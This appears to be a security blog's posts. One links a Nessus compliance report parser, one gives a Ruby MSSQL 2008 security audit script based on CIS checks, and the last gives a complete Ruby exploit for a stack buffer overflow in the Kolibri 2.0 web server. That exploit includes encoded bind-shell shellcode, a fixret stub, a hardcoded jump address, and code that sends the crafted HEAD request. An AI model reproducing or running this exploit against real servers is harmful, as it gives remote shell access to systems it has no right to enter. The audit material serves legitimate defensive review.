Gremwell Magictree - Nessus Compliance Audit Parser and Sample Report Template

I always having trouble generating compliance report using nessus, so i modify the nessus22mt.xsl in magictree nessus xml parser to assist me. Nothing fancy just a decent report to ease my load during reporting process.

1) nessus22mt.xsl

https://drive.google.com/file/d/0B8CrAOgplUJcTGJWd21tZ1FtYW8/edit?usp=sharing

2) Sample report template (openoffice)

https://drive.google.com/file/d/0B8CrAOgplUJcY1JidEU0bEgwR1U/edit?usp=sharing

MSSQL 2008 Database Security Audit Script

#!/usr/bin/env ruby

# Author : Muhamad Fadzil Ramli
# Title : mssql audit script - 2013
# Installation:
# yum install freetds freetds-dev ruby ruby-dev
# gem install tiny_tds
# Notes:
# This script was created to assist me during mssql 2008 database security audit for a customer.
# Reference:
# CIS Security Benchmark
# http://www.mssqltips.com/sqlservertip/2887/sql-server-security-audit-part-2-scripts-to-help-you-or-where-can-you-find-more-information/

require 'rubygems'
require 'tiny_tds'

user = "sa"
pass = "password"
dbsvr = "192.168.1.129"

begin
  client = TinyTds::Client.new(:username => user, :password => pass, :dataserver => dbsvr)
rescue TinyTds::Error => e
  puts "[!] #{e}"
  exit
end

sql = Array.new()

# A.1 / CIS.1.1 / SERVICE PACKS AND PATCHES
sql[0] = [%Q[A.1\t- Service pack and patches], %Q[
SELECT SERVERPROPERTY('ProductLevel') as SP_installed,
SERVERPROPERTY('ProductVersion') as Version
]]

# B.4 / CIS.4.1 / AUTH MODE
sql[4] = [%Q[B.4\t- Authentication mode - Windows], %Q[
xp_loginconfig 'login mode'
]]

# B.5 / C2 AUDIT MODE
sql[5] = [%Q[B.5\t- C2 audit mode - Enable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'c2 audit mode'
]]

# B.6 / SCAN STARTUP PROCS
sql[6] = [%Q[B.6\t- Scan for startup procedures - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'scan for startup procs'
]]

# B.7 / NAMED PIPES
#sql[7] = [%Q[B.7\t- Named pipes disabled?], %Q[
#SELECT name, type_desc, state, state_desc,
#endpoint_id FROM sys.endpoints WHERE endpoint_id < 65536 AND protocol = 3
#]]

# B.7 / NAMED PIPES
sql[7] = [%Q[B.7\t- Named pipes - Disable], %Q[
DECLARE @NamedPipesEnabled int
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',
N'Software\\Microsoft\\MSSQLServer\\MSSQLServer\\SuperSocketNetLib\\Np',
N'Enabled',
@NamedPipesEnabled OUTPUT
SELECT @NamedPipesEnabled AS NamedPipesEnabled
]]

# B.8/B.9 - Works only in SQL 2008 SP1 & 2012
sql[8] = [%Q[B.8 - SQL services], %Q[
SELECT * FROM sys.dm_server_services
]]

# B.10
sql[10] = [%Q[B.10\t- Distributed Transaction Coordinator - Disable], %Q[
sp_configure 'remote proc trans'
]]

# B.11 / CIS-2.3 / CROSS DATABASE-OWNERSHI CHAINING
sql[11] = [%Q[B.11 - Cross db ownership chaining - Disbale], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Cross db ownership chaining'
]]

# B.12 / REPLICATION
sql[12] = [%Q[B.12\t- Replication XPs - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Replication XPs'
]]

# B.13 / Local Administration Group Membership
sql[13] = [%Q[B.13\t- Local administration group membership - None], %Q[
EXEC master.sys.xp_logininfo 'BUILTIN\Administrators','members'
]]

# C.14 / CIS.2.14 # SA ENABLED?
sql[14] = [%Q[C.14\t- SA account - Disable], %Q[
SELECT name, is_disabled
FROM sys.server_principals
WHERE sid = 0x01
]]

# C.15 / LIST DATABASES
sql[15] = [%Q[C.15\t- Default database exist? PUBS, Northwind], %Q[
SELECT name
FROM master..sysdatabases
]]

#sql[15] = [%Q[C.15\t- List Database], %Q[
#SELECT name FROM master.sys.databases
#WHERE name IN ('pubs', 'Northwind') OR name LIKE 'Adventure Works%'
#]]

# C.16 / LIST STORED PROCEDURES
sql[16] = [%Q[C.16\t- Drop unnecessary stored procedures. e.g xp_cmdshell], %Q[
EXECUTE sp_helpextendedproc
]]

# D.17 / PASSWORD POLICY ENFORCEMENT
sql[17] = [%Q[D.17\t- Password Policy Enforcement - Enable], %Q[
SELECT SQLLoginName = sp.name,
PasswordPolicyEnforced = CAST(sl.is_policy_checked AS BIT)
FROM sys.server_principals sp
JOIN sys.sql_logins AS sl ON sl.principal_id = sp.principal_id
WHERE sp.type_desc = 'SQL_LOGIN'
]]

# E.18 / Enable Security Audit Events
sql[18] = [%Q[E.18\t- Security audit events - Enable], %Q[
select * from sys.database_audit_specification_details
]]

# E.19 / CIS.6.3 / LOGIN ATTEMPTS LOG
sql[19] = [%Q[D.19\t- Logging of login attemps - All], %Q[
XP_loginconfig 'audit level'
]]

# E.20 / MAXIMUM NUMBER OF LOGS
sql[20] = [%Q[D.20\t- Maximum numbers of error logs - 12], %Q[
DECLARE @MaxNumErrorLogs int
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',
       N'Software\\Microsoft\\MSSQLServer\\MSSQLServer',
       N'NumErrorLogs',
       @MaxNumErrorLogs OUTPUT
       SELECT @MaxNumErrorLogs AS MaxNumErrorLogs
]]

# F.21 / CIS.2.9 / SQL MAIL XPS
sql[21] = [%Q[F.21\t- SQL Mail XPs  - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'SQL Mail XPs'
]]

# G.22 / AD HOC REMOTE QUERIES
sql[22] = [%Q[G.22\t- Ad hoc remote queries - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'ad hoc distributed queries'
]]

# G.23 / CLR INTEGRATION
sql[23] = [%Q[G.23\t- CLR Integration - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'clr enabled'
]]

# G.24 / DATABASE MAIL
sql[24] = [%Q[G.24\t-Database Mail - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Database Mail XPs'
]]

# G.25 / NATIVE XML WEB SERVICES
sql[25] = [%Q[G.25\t- Native XML Web Services - None], %Q[
SELECT name, type_desc, state, state_desc,
endpoint_id FROM sys.endpoints WHERE endpoint_id < 65536 AND type = 1
]]

# G.26 / SERVICE BROKER
sql[26] = [%Q[G.26\t- Service Broker - None], %Q[
SELECT name, type_desc, state, state_desc,
endpoint_id FROM sys.endpoints WHERE endpoint_id < 65536 AND type = 3
]]

# G.27
sql[27] = [%Q[G.27\t- Web Assistant - None], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Web Assistant Procedures'
]]

# G.29 / ANONYMOUS CONNECTIONS
sql[29] = [%Q[G.29\t- Anonymous connections - Disable], %Q[
DECLARE @AnonConn INT
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',
       N'SYSTEM\\CurrentControlSet\\Control\\Lsa',
       N'TurnOffAnonymousBlock',
       @AnonConn OUTPUT
       SELECT @AnonConn AS AnonConnections
]]

# G.30 / LINKED OBJECTS / http://support.microsoft.com/kb/203638
sql[30] = [%Q[G.30\t- Linked objects - Disable], %Q[
sp_linkedservers
]]

# G.31 / USER DEFINED FUNC
sql[31] = [%Q[G.31\t- User defined functions - None], %Q[
SELECT *
FROM sys.objects
WHERE type_desc = 'SQL_SCALAR_FUNCTION'
]]

# G.32 / WINDOWS INTEGRATED SECURITY
sql[32] = [%Q[G.32 - Windows integrated security - Enable], %Q[
SELECT CAST(SERVERPROPERTY ('IsIntegratedSecurityOnly') as int) as WinIntegratedSecurity
]]

# G.33 / VIEW PUBLIC PERMISSION
sql[33] = [%Q[G.33\t- List 'PUBLIC' permission], %Q[
sp_helprotect @username='public'
]]

count = 0
sql.each do |col|
    if col.nil?
        next
    end

    if client.active?
      res = client.execute(col[1])
    else
      puts "[!] sql client is not active"
    end

    count += 1
    puts "[#{count}] #{col[0]}"

    res.each do |row|
        puts row.to_s
    end
    puts ""
end

Kolibri HEAD Request Stack Buffer Overflow - FixRet Technique

#!/use/bin/env ruby
#
# Exploit Title: Kolibri HEAD Request Stack Buffer Overflow 
# Date: 03 May 2014
# Exploit Author: Muhamad Fadzil Ramli 
# Vendor Homepage: http://www.senkas.com/kolibri/download.php
# Version: Kolibri 2.0 
# Tested on: Microsoft Windows XP (EN) SP3 [Version 5.1.2600]
# MSF Module : https://drive.google.com/file/d/0B8CrAOgplUJcVGpCTGY3VEVyam8/edit?usp=sharing
#
# Description: 
# The affected software suffer a buffer overflow when a long HEAD command is sent to the server.
# Notes:
# Purposely using larger payload size to overwrite return address location so that 'fixret' technique can be applied.
# Reference:
# 1) http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
# 2) jduck - fixret msf module
# 3) http://www.exploit-db.com/exploits/16970/ (mr_me)
# 4) 'TheLeader' - original exploit

require 'socket'

host = "127.0.0.1"
port = 8080

# ./msfpayload -p windows/shell_bind_tcp LPORT='2020' R | ./msfencode -b '\x00\x0d\x0a\x20\x40\x3f' -t ruby -e x86/alpha_upper
# payload size : 751
bindtcp =
"\x89\xe6\xdb\xda\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a" +
"\x48\x4c\x49\x35\x50\x33\x30\x43\x30\x53\x50\x4c\x49\x5a" +
"\x45\x36\x51\x58\x52\x52\x44\x4c\x4b\x46\x32\x50\x30\x4c" +
"\x4b\x56\x32\x34\x4c\x4c\x4b\x51\x42\x42\x34\x4c\x4b\x44" +
"\x32\x56\x48\x44\x4f\x4e\x57\x51\x5a\x36\x46\x46\x51\x4b" +
"\x4f\x50\x31\x39\x50\x4e\x4c\x37\x4c\x45\x31\x53\x4c\x35" +
"\x52\x36\x4c\x47\x50\x49\x51\x38\x4f\x34\x4d\x33\x31\x48" +
"\x47\x4b\x52\x5a\x50\x36\x32\x51\x47\x4c\x4b\x30\x52\x34" +
"\x50\x4c\x4b\x50\x42\x57\x4c\x55\x51\x4e\x30\x4c\x4b\x57" +
"\x30\x34\x38\x4c\x45\x39\x50\x43\x44\x31\x5a\x33\x31\x38" +
"\x50\x50\x50\x4c\x4b\x31\x58\x55\x48\x4c\x4b\x36\x38\x47" +
"\x50\x45\x51\x4e\x33\x5a\x43\x47\x4c\x57\x39\x4c\x4b\x47" +
"\x44\x4c\x4b\x43\x31\x38\x56\x50\x31\x4b\x4f\x36\x51\x49" +
"\x50\x4e\x4c\x4f\x31\x48\x4f\x54\x4d\x53\x31\x58\x47\x56" +
"\x58\x4d\x30\x32\x55\x4b\x44\x33\x33\x43\x4d\x5a\x58\x47" +
"\x4b\x43\x4d\x37\x54\x34\x35\x4a\x42\x51\x48\x4c\x4b\x31" +
"\x48\x56\x44\x35\x51\x39\x43\x32\x46\x4c\x4b\x34\x4c\x30" +
"\x4b\x4c\x4b\x50\x58\x35\x4c\x33\x31\x39\x43\x4c\x4b\x44" +
"\x44\x4c\x4b\x45\x51\x4e\x30\x4c\x49\x31\x54\x46\x44\x57" +
"\x54\x31\x4b\x51\x4b\x55\x31\x30\x59\x30\x5a\x36\x31\x4b" +
"\x4f\x4d\x30\x30\x58\x31\x4f\x50\x5a\x4c\x4b\x44\x52\x5a" +
"\x4b\x4b\x36\x31\x4d\x43\x58\x36\x53\x50\x32\x55\x50\x33" +
"\x30\x35\x38\x33\x47\x54\x33\x47\x42\x51\x4f\x51\x44\x55" +
"\x38\x50\x4c\x32\x57\x56\x46\x33\x37\x4b\x4f\x38\x55\x4e" +
"\x58\x5a\x30\x33\x31\x43\x30\x55\x50\x51\x39\x49\x54\x50" +
"\x54\x56\x30\x55\x38\x51\x39\x4b\x30\x52\x4b\x45\x50\x4b" +
"\x4f\x38\x55\x50\x50\x46\x30\x50\x50\x50\x50\x31\x50\x30" +
"\x50\x51\x50\x56\x30\x32\x48\x5a\x4a\x54\x4f\x59\x4f\x4d" +
"\x30\x4b\x4f\x48\x55\x4b\x39\x58\x47\x56\x51\x39\x4b\x50" +
"\x53\x32\x48\x34\x42\x35\x50\x54\x47\x4b\x54\x4d\x59\x4d" +
"\x36\x52\x4a\x44\x50\x51\x46\x31\x47\x55\x38\x4f\x32\x59" +
"\x4b\x36\x57\x52\x47\x4b\x4f\x49\x45\x30\x53\x46\x37\x33" +
"\x58\x4e\x57\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x48\x55\x46" +
"\x33\x56\x33\x46\x37\x45\x38\x53\x44\x5a\x4c\x37\x4b\x4b" +
"\x51\x4b\x4f\x38\x55\x56\x37\x4b\x39\x39\x57\x33\x58\x54" +
"\x35\x32\x4e\x30\x4d\x33\x51\x4b\x4f\x49\x45\x45\x38\x43" +
"\x53\x52\x4d\x52\x44\x45\x50\x4b\x39\x5a\x43\x30\x57\x56" +
"\x37\x31\x47\x36\x51\x4a\x56\x43\x5a\x45\x42\x51\x49\x30" +
"\x56\x4b\x52\x4b\x4d\x35\x36\x49\x57\x57\x34\x51\x34\x57" +
"\x4c\x43\x31\x33\x31\x4c\x4d\x50\x44\x51\x34\x42\x30\x39" +
"\x56\x53\x30\x50\x44\x46\x34\x50\x50\x30\x56\x51\x46\x31" +
"\x46\x50\x46\x31\x46\x30\x4e\x30\x56\x50\x56\x30\x53\x30" +
"\x56\x43\x58\x42\x59\x38\x4c\x57\x4f\x4d\x56\x4b\x4f\x4e" +
"\x35\x4c\x49\x4b\x50\x50\x4e\x56\x36\x30\x46\x4b\x4f\x56" +
"\x50\x45\x38\x53\x38\x4d\x57\x45\x4d\x55\x30\x4b\x4f\x38" +
"\x55\x4f\x4b\x4c\x30\x58\x35\x39\x32\x51\x46\x42\x48\x4f" +
"\x56\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54" +
"\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x54\x35\x43" +
"\x35\x4f\x4b\x47\x37\x44\x53\x32\x52\x32\x4f\x53\x5a\x45" +
"\x50\x51\x43\x4b\x4f\x58\x55\x41\x41"

# 750 buffer
data = "A" * 796

# fixret stub
# Reference : http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
data[1,9] = "\x90" * 9
data[10,2] = "\x89\xe2"              # mov edx,esp
data[12,6] = "\xc7\x02\x43\x43\x43\x43"    # mov [edx],0x43434343
data[18,3] = "\x83\xc2\x04"           # add edx,4
data[21,3] = "\xc6\x02\xc0"           # mov byte ptr [edx], 0x42
data[24,3] = "\x83\xea\x08"           # sub edx,8
data[27,6] = "\xc7\x02\x41\x41\x41\x41"    # mov [edx],0x41414141
data[33,6] = "\x81\xc4\xfc\xfd\xff\xff"    # add esp,0xfffffdfc
data[39,bindtcp.length] = bindtcp

# Patch the original stack data into the fixer stub
data[14,4] = data[519,4] # patch jmp near 1-4 byte code
data[23,1] = data[523,1] # patch jmp near 5th byte code
data[29,4] = data[515,4] # patch ret addr

# Overwriting part of the payload with ret address and jmp code
data[515,4] = [0x775a693b].pack("V")    # jmp esp # 5.1.2600.6435 [OLE32.dll]
data[519,5] = "\xe9\xfb\xfd\xff\xff"    # jmp $-512

payload =
"HEAD /#{data} HTTP/1.11\r\n\r\n"

s = TCPSocket.new(host, port)
s.send(payload,0)
s.close